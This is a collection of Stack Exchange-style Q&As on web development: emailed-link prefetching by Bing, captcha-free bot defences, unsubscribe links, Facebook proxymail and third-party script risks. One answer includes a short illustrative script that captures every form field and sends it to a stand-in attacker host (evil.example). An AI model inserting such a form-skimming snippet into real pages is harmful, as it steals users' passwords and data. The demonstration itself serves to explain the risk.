Are URLs in emails indexed by search engines so they become publicly searchable?

I have read a few questions on here about e-mail clients prefetching URLs in e-mails. A common answer seems to be to add a confirmation page, where the user has to click a button to confirm the desired action.
But, this answer states the following:
As of Feb 2017 Outlook (https://outlook.live.com/) scans emails
arriving in your inbox and it sends all found URLs to Bing, to be
indexed by Bing crawler.
This effectively makes all one-time use links like
login/pass-reset/etc useless.
(Users of my service were complaining that one-time login links don't
work for some of them and it appeared that BingPreview/1.0b is hitting
the URL before the user even opens the inbox)
Drupal seems to be experiencing the same problem:
https://www.drupal.org/node/2828034
My major concern is with this statement:
As of Feb 2017 Outlook (https://outlook.live.com/) scans emails
arriving in your inbox and it sends all found URLs to Bing, to be
indexed by Bing crawler.
If this is the case, any URL in an e-mail meant to confirm an action, e.g. confirming a login, subscription, or unsubscription, can end up searchable in a search engine, if that's what's meant by "indexed" in the quote above. In this case, it's Bing. Not even a dedicated confirmation page where the user confirms the desired action truly mitigates this.
Scenario #1
If I email the user a login link with a one-time token in the URL, that URL will end up in Bing. This token will have a short lifetime, let's say 5 minutes, so I doubt anyone will manage to find the URL on Bing before the user clicks it or it expires.
Scenario #2
The user gets an e-mail with a link to confirm a subscription. This link is perhaps valid for 24 hours. This might(?) be long enough for someone else to stumble upon the link in a search engine and accidentally (or on purpose) confirm the subscription on the user's behalf.
Scenario #2 is not uncommon; as far as I am aware, double opt-in is even considered best practice.
Scenario #3
Unsubscribe URLs at the bottom of newsletters. Maybe valid forever? You don't want these publicly searchable in a search engine.
Assume all the one-time confirmation links land on a confirmation page where the user confirms the desired action.
Is it true that URLs in e-mails are indexed by search engines, at least by Bing? And will they actually end up publicly searchable? If not, what is meant by "indexed" in the quote above?
I'll add, for the sake of completeness, that I don't think I've had much of a problem with this in my own use of the web, so my gut feeling is that this is unlikely to be the case.

Is it true that URLs in e-mails are indexed by search engines, at least by Bing?
I can't say definitively whether they are being indexed or not; only Bing could answer that question. But the URLs are certainly being visited, at least with a simple GET request. I just tested this by sending myself a link to a page on my website that logs the requests made against it, and indeed I'm seeing a GET coming from 207.46.13.181 (reverse DNS says msnbot-207-46-13-181.search.msn.com), which suggests that an automated program from search.msn.com is crawling the link. This leads me to believe that yes, they are trying to index the link's content somehow, but that's only my opinion really.
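If you want to reproduce that test yourself, here is a minimal sketch of such a logging endpoint, assuming Express in TypeScript (the /probe route, port, and log format are my own invention, not what I actually ran):

import express from "express";

const app = express();

// Log every request so scanner hits (e.g. BingPreview) show up immediately.
app.get("/probe/:id", (req, res) => {
  console.log(new Date().toISOString(), req.ip, req.get("user-agent"));
  res.send("ok");
});

app.listen(3000);

Mail a link like http://yoursite.example/probe/test123 to yourself and watch the log for requests that arrive before you ever open the message.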
And will they actually end up publicly searchable? If not, what is meant by "indexed" in the quote above?
Well, again, that's impossible to say unless you work for Bing. In any case, "indexing" means exactly what you think it does: parsing the content of a page to potentially include it in search results.
The real question here is: does this somehow represent a security problem or will it compromise my website's functionality?
It certainly has the potential to: if your confirmation/reset/subscription/whatever process relies only on a single GET request with the appropriate GET parameter, then you should definitely revisit the strategy, as it obviously allows anyone to perform the action (even maliciously, for example by enumerating possible IDs for your GET parameters).
If the link you are sending contains sensitive information or can be used to alter important data for a user of your website, then you should at least put it behind a login page that only gives access to the intended user. This way, anyone who tries to access it (including search engines) will be redirected to a login page if not already logged in.
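A minimal sketch of that gating idea, assuming Express with express-session in TypeScript (the route, session field, and secret are all made up):

import express from "express";
import session from "express-session";

declare module "express-session" {
  interface SessionData { userId?: string; }
}

const app = express();
app.use(session({ secret: "dev-secret", resave: false, saveUninitialized: false }));

// The sensitive emailed link points here. Crawlers never carry a login
// session, so all they ever see is the redirect to the login page.
app.get("/account/reset-password", (req, res) => {
  if (!req.session.userId) {
    return res.redirect("/login?next=" + encodeURIComponent(req.originalUrl));
  }
  res.send("Render the actual password-reset page for the logged-in user here.");
});

app.listen(3000);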
If the link you are sending is just some kind of harmless confirmation link (e.g. subscribe/unsubscribe from a newsletter), then at least use a form inside the web page to do the actual confirmation through a POST request (possibly also using a CSRF token); otherwise you will inevitably end up with false positives.
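As a rough illustration of that form-based approach, assuming Express in TypeScript (route and field names are hypothetical): the emailed link only renders a form on GET, and the state change happens on POST, so a crawler following the link changes nothing.

import express from "express";

const app = express();
app.use(express.urlencoded({ extended: false }));

// The emailed link points here. A GET (from the user, Bing, or anything
// else) only renders a confirmation form and has no side effects.
app.get("/confirm", (req, res) => {
  const token = String(req.query.token ?? "");
  if (!/^[\w-]{16,}$/.test(token)) return res.status(400).send("Bad token");
  res.send(`
    <form method="POST" action="/confirm">
      <input type="hidden" name="token" value="${token}">
      <button type="submit">Yes, confirm</button>
    </form>`);
});

// The action itself only happens on an explicit POST from that form.
app.post("/confirm", (req, res) => {
  const token = String(req.body.token ?? "");
  // ... look up the pending action for `token`, check it hasn't expired,
  // mark it used, and perform the confirmation here ...
  res.send("Confirmed.");
});

app.listen(3000);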

Related

How are websites like Facebook protected against bots without any captcha?

How are websites like Facebook and Twitter protected against bots during registration? I mean, there's no captcha at all on the signup form.
I want to create a signup form for a project, and I don't want bots registering; captchas are often ugly.
Edit:
My question is really about registration, because I know Facebook uses captchas once you have registered for the first time.
Facebook uses some sort of hidden spam protection. If you view the source of the sign-up form you will see things like:
class="hidden_elem"><div class="fsl fwb">Security Check</div>This is a standard security test that we use to prevent spammers from creating fake accounts and spamming users.
So the captcha becomes visible when the JavaScript decides that you are a bot.
There are a few methods of making it harder for bots to complete registration without a captcha: things like timing how long the form takes to fill out, checking the originators of mouse click events, etc.
You can also put random session-based values in the form (to prevent direct submissions that never downloaded the form first).
Some people also use hidden form elements with common names like 'email', styled invisible in CSS; common simple bots will try to fill out all form fields, so you can block them if this hidden element has any value.
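A rough sketch combining the form-token and honeypot ideas, assuming Express in TypeScript (all route and field names are made up, and the token store is in-memory for illustration only):

import express from "express";
import crypto from "crypto";

const app = express();
app.use(express.urlencoded({ extended: false }));

// Tokens handed out with the form; a direct POST that never fetched the
// form won't have a valid one.
const issuedTokens = new Set<string>();

app.get("/signup", (req, res) => {
  const token = crypto.randomBytes(16).toString("hex");
  issuedTokens.add(token);
  res.send(`
    <form method="POST" action="/signup">
      <input type="hidden" name="form_token" value="${token}">
      <!-- honeypot: invisible to humans, but naive bots fill every field -->
      <input name="email_confirm" style="display:none" tabindex="-1" autocomplete="off">
      <input name="email">
      <button type="submit">Sign up</button>
    </form>`);
});

app.post("/signup", (req, res) => {
  const { form_token, email_confirm } = req.body;
  // Reject submissions that never fetched the form, or that filled the honeypot.
  if (!issuedTokens.delete(form_token) || email_confirm) {
    return res.status(400).send("Rejected");
  }
  res.send("Registered");
});

app.listen(3000);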
Twitter and Facebook spend a lot of time developing techniques to block spammers, and I don't think they will make them public, as that would be counterproductive in their fight against the spammers.
But you can download all the client-side JavaScript from Facebook or Twitter and study it if you want, because most of the protection happens on the client, not the server.
The server can only issue some random session variable, check for valid headers in the request, measure overall time, etc.; it's really limited.
Some sites also use AJAX exchanges between server and client while the user is filling out the form, mostly just to make it harder for a bot developer to fake similar exchanges of data.
Anyway, unfortunately there is no easy solution for decent protection, especially without a captcha or some kind of question.
Also, for the submit button you can use an image map instead of a button: dynamically create a big image with a submit-button image drawn on it at a random position (using something like GD in PHP), use CSS to display only the portion of that image containing the actual button, and on the server side check the X and Y position of where the mouse was clicked. This will be hard for bots to break, unless they use real browsers and just emulate the keyboard and mouse. Anyway, as I said, unfortunately there is no easy solution.
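A rough sketch of the coordinate check, assuming Express in TypeScript (the button region is hard-coded here instead of randomized per session, and all names are invented). Browsers submit the click coordinates of an image submit button as name.x / name.y:

import express from "express";

const app = express();
app.use(express.urlencoded({ extended: false }));

app.get("/form", (req, res) => {
  // In the full scheme you'd draw the button at a random offset per session
  // and remember that offset server-side; here the region is fixed.
  res.send(`
    <form method="POST" action="/submit">
      <input type="image" name="go" src="/button.png" alt="submit">
    </form>`);
});

app.post("/submit", (req, res) => {
  // The browser sends the click position inside the image as go.x / go.y.
  const x = Number(req.body["go.x"]);
  const y = Number(req.body["go.y"]);
  // Assume the drawn button occupies the 100x40 region at (120, 60).
  const insideButton = x >= 120 && x <= 220 && y >= 60 && y <= 100;
  res.send(insideButton ? "Accepted" : "Rejected");
});

app.listen(3000);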
One way would be to send a verification code to the user's email address or cell phone and require confirmation (in that case, you would have to allow only one email address or cell phone number per account).
Another option is to use "Negative CAPTCHA" or "Honeypot Captcha"
I don't know how Facebook and Twitter do it, but if you want to create something simple that doesn't interfere with your site's aesthetics, I know that some websites just ask the user to answer a simple math problem like "what is 2 + 3?". It's not the most secure way to do it, but it's a thought.
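For what it's worth, a minimal sketch of such a math challenge, assuming Express in TypeScript (routes, field names, and the in-memory challenge store are all invented for illustration):

import express from "express";
import crypto from "crypto";

const app = express();
app.use(express.urlencoded({ extended: false }));

// challenge id -> expected answer
const challenges = new Map<string, number>();

app.get("/signup", (req, res) => {
  const a = crypto.randomInt(1, 10);
  const b = crypto.randomInt(1, 10);
  const id = crypto.randomBytes(8).toString("hex");
  challenges.set(id, a + b);
  res.send(`
    <form method="POST" action="/signup">
      <input type="hidden" name="challenge_id" value="${id}">
      <label>What is ${a} + ${b}? <input name="answer"></label>
      <button type="submit">Sign up</button>
    </form>`);
});

app.post("/signup", (req, res) => {
  const expected = challenges.get(req.body.challenge_id);
  challenges.delete(req.body.challenge_id); // one attempt per challenge
  if (expected === undefined || Number(req.body.answer) !== expected) {
    return res.status(400).send("Wrong answer");
  }
  res.send("Registered");
});

app.listen(3000);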
You can also deploy hardware solutions to create layer 4-7 firewall rules. You can create specific rules to look for the well-known user agents of bots crawling the web. However, to stop newly created bots you need to know what user agent the bot is using.
Since you don't want a CAPTCHA, you can use Keypic - keypic.com - which is an invisible protection; no CAPTCHA is needed. It's an efficient antispam method for any web form. Site users don't have to pass any tests, which is good for the site as it improves the quality of the user experience and thus raises user engagement. The solution is a kind of expert system which analyses the behaviour of users and checks its databases, then concludes whether the request comes from a legitimate user or a robot.
BTW, Twitter and Facebook still use CAPTCHAs for password verification, which is a questionable method in terms of the efficiency of such protection.
I had a problem with tons of bots signing up for my Nintendo site, so I put a single image of Mario on the sign-up page (making sure nothing in the image data said "Mario") with the text "Who is this? Answer in one word." I haven't had a single bot sign-up since. Not sure if this is actually a good solution though; I'm not sure how smart bots are. I'm kind of surprised that it worked.
In theory it might be keeping out a few legitimate users, but it is hard to imagine many legitimate users of a Nintendo site not knowing who Mario is...

Unsubscribe links in email marketing

I just signed up with a third-party email marketing provider. When I provide the template, they give me a small tag to place, which they substitute with a user-specific unsubscribe link.
My concern is that the link is single-click; there is no subsequent confirmation. Whilst I am all for easy removal, I worry that some combination of malware scanners, AV engines, and spam scanners will follow the link and thus unsubscribe many legitimate users.
Is it the norm for a single HTTP GET request to unsubscribe a user?
How are other developers handling this issue?
Note: The provider in question is critsend
Interesting question. It's not the norm, but it is common with cautious email service providers. For example, MailChimp also has a one-click unsubscribe for its freemium users. I'm not a big fan of that either. (I'd prefer a prefilled form field, where the user confirms their wish to unsubscribe by clicking "submit".) However, I haven't witnessed any problems with one-click unsubscribes so far.
FYI, here’s a discussion addressing a similar topic (false positive double opt-in confirmations). You might also want to check out this article and this discussion (forum registration required).
The norm is that, once clicked, the link goes to a form where you click a button to confirm removal. It's strange that single-click unsubscribes are even available.
Any HTTP GET request that changes state as a side effect is non-conforming as far as HTTP is concerned. In particular, see this from RFC 2616, section 9.1.1:
In particular, the convention has been established that the GET and HEAD methods SHOULD NOT have the significance of taking an action other than retrieval. These methods ought to be considered "safe". This allows user agents to represent other methods, such as POST, PUT and DELETE, in a special way, so that the user is made aware of the fact that a possibly unsafe action is being requested.
It would be more standard to put the actual unsubscribe behind a form submission to cause a POST.
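A minimal sketch of that pattern, assuming Express in TypeScript (routes and field names invented): the same GET-renders-a-form, POST-acts flow discussed in the first question above, applied to the unsubscribe link.

import express from "express";

const app = express();
app.use(express.urlencoded({ extended: false }));

// The link in the newsletter lands here. GET stays side-effect free,
// so a scanner or AV engine following it unsubscribes nobody.
app.get("/unsubscribe", (req, res) => {
  const token = String(req.query.token ?? "");
  if (!/^[\w-]+$/.test(token)) return res.status(400).send("Bad link");
  res.send(`
    <form method="POST" action="/unsubscribe">
      <input type="hidden" name="token" value="${token}">
      <button type="submit">Yes, unsubscribe me</button>
    </form>`);
});

// Only this explicit POST actually removes the subscriber.
app.post("/unsubscribe", (req, res) => {
  // ... resolve req.body.token to a subscriber and remove them here ...
  res.send("You have been unsubscribed.");
});

app.listen(3000);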
I know Campaign Monitor has built-in procedures to catch non-user unsubscribes. Not sure about critsend.

Are proxymail.facebook.com email addresses still supported?

They all seem to be either bouncing explicitly or silently not going through now (zero open/click rate), and they had been working since the feature was first introduced. I know Facebook isn't giving users the option to choose a proxymail.facebook.com address anymore in the newer Auth box. Thanks.
The answer is NO. Facebook no longer issues proxymail addresses.
There is no official reference I can attach to this answer, but I found this for reference:
Pretty sure it's still available to users, but Facebook rolls out
updates to their dialog boxes slowly, so it's possible a newer (or
even an older) one doesn't have that option.
This was one link where you had that option:
Now, after the recent updates, the Change button has been removed.
I can answer the specific question I asked so long ago. I think Facebook must have had a bug for a while that broke the *@proxymail.facebook.com email integration, and it was during this period that I asked my original question. However, looking at our email logs, I can see that people have clicked on links in email sent to these Facebook proxy emails at the end of October, so whatever the issue was must have been resolved, and I believe that if you have a Facebook proxy email, you can safely send to it.
That being said, of course the individual user may have revoked the email permission (in which case their proxy email will go nowhere), and my impression is the same as sfussenegger's: Facebook is no longer allowing users to use proxy email addresses. I haven't seen the option to anonymize my email in a FB permissions dialog in a long time...
Does this answer your question?
Communicating Directly with Your Users via Email
The reason you're getting no click rates is that in all outgoing emails that go through the Facebook proxymail servers, the remailer rewrites the links. So stuff of the form:
<a href="http://www.domain.com/">
gets re-written as:
<a href="l.php/?u=http://www.domain.com/">
which is a broken link, so your open-detection or click-detection probably won't work at all. And undoubtedly, users are confused (as evidenced by my users who ran into this).

Google Analytics - can it collect form data?

Simple scenario:
I have a signup form with user name, password, email address, maybe a credit card number.
At the bottom of the page, I implement the Google Analytics code.
When the user clicks submit, it goes to a page without Google Analytics.
The question is:
Can GA get the data (user name, password, email, etc.) in the first form after the user has entered it?
Do they say anything about it in their TOS or Privacy policy?
Yes. Any <script> you include in the page has complete access to alter the user's interaction with the site due to the Same Origin Policy. Google, if they were feeling Evil today, could certainly rewrite the action of your <form> to point to themselves, or log every keypress, or create an <iframe> containing another page on your site and simulate the user clicking on any action in that page.
Do not include a <script> on any page from a party you don't completely trust with the security of everything on your site. Even a single tracking or advertiser script on any page compromises everything on the same hostname (and maybe other subdomains if you are setting document.domain to allow cross-hostname scripting, or sharing cookies between hostnames).
However, the Analytics script doesn't currently do any of these things and the form submission will not flow to Google as a matter of course; they would have to deliberately act to steal the data. Clearly it would be disastrous for them to be discovered doing it, so they presumably won't. But technically, they could. It always pains me to see third-party ad and tracking scripts on bank sites.
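To make the point concrete, here is a sketch of what any included third-party script could do on your page. This is illustrative only: the collection endpoint is invented, and, as said above, Google Analytics does nothing of the sort.

// Runs with the full privileges of the including page.
document.querySelectorAll("form").forEach((form) => {
  form.addEventListener("submit", () => {
    const fields = new URLSearchParams();
    new FormData(form).forEach((value, name) => {
      fields.append(name, String(value));
    });
    // Ship every field, passwords included, to a third-party server.
    navigator.sendBeacon("https://evil.example/collect", fields);
  });
});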
UPDATE: The landscape has changed quite a bit over the years since my original answer below was written: the scripts are now generally served (or at least have the option to be fetched) over HTTPS, so those scripts should be secure against the trivial man-in-the-middle attacks. However, you are still trusting the script source not to do malicious stuff in your page, since they still get to fully control what happens on your web page.
Original answer:
Yes. I recommend against putting any third-party script on sensitive pages secured by SSL. It's not likely that Google is going to hijack sensitive data on your page, but you should take into account the possibility that a malicious ISP could hijack the request for the Google Analytics script (say, using DNS) and do whatever it wants on your page.

Is it possible to know where the user is coming from when they use the back button?

For example,
if a user goes to google -> example.com -> newwebsite.com
and then goes back to example.com, the HTTP referrer will still be google.com.
How can I detect that they went to newwebsite.com?
I believe that the back button will send the HTTP headers that were sent to the site the first time around, since it's not really a new visit.
Say you displayed an error page if the user's HTTP referrer was newwebsite.com. The first time they visited, they would get your site. If they went to newwebsite.com and then hit back (meaning they wanted to go back in time through their browser history, not load the page again with new headers), they would get an error page, and the purpose of the back button would be defeated. I don't know if this is the reasoning behind that behavior, it just makes sense to me that way.
Maybe it's possible, but it would be entirely browser-dependent. Why do you need this functionality, anyway? Newwebsite isn't referring the user to your website; there's no connection between the two at all. It just happens to be the last page the user visited.
If a visitor uses the back button, the page might be loaded from browser cache. In that case, no referrer is sent.
Using Google Analytics, you can see how many visitors came from a given website. This might give you some information.
I don't believe this is generally possible. You could pull tricks with JavaScript on your site so that all the links navigated from there could be detected and recorded, but once the user is off your site you've got no control.
If you provided the browser, i.e. developed your own, then you could choose to expose the browser history via an API.
http://jeremiahgrossman.blogspot.com/2006/08/i-know-where-youve-been.html
The post above describes a technique for exploiting the browser's agreement to modify links to indicate that they have been traversed (e.g. changing the colour of the link) so that visited sites can be detected. However, this only works for a pre-declared set of links; it's not a generally applicable approach.
My feeling is that attempts to hide the nature of browsers - users can hop around all over the place - tend to lead to unsatisfactory 79% solutions that mystify users.
What problem are you actually trying to solve?
You can use sessions in order to track the path of pages. It really works well; try it.
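For example, a minimal client-side sketch of that idea using sessionStorage (the key name is invented): each page on your site records itself, so you can read back the within-site path, including back-button revisits. Note that, as the answers above explain, this still cannot reveal the off-site visit to newwebsite.com.

// Runs on every page of your site.
const navPath: string[] = JSON.parse(sessionStorage.getItem("navPath") ?? "[]");
navPath.push(location.pathname);
sessionStorage.setItem("navPath", JSON.stringify(navPath));
console.log("Pages visited on this site, in order:", navPath);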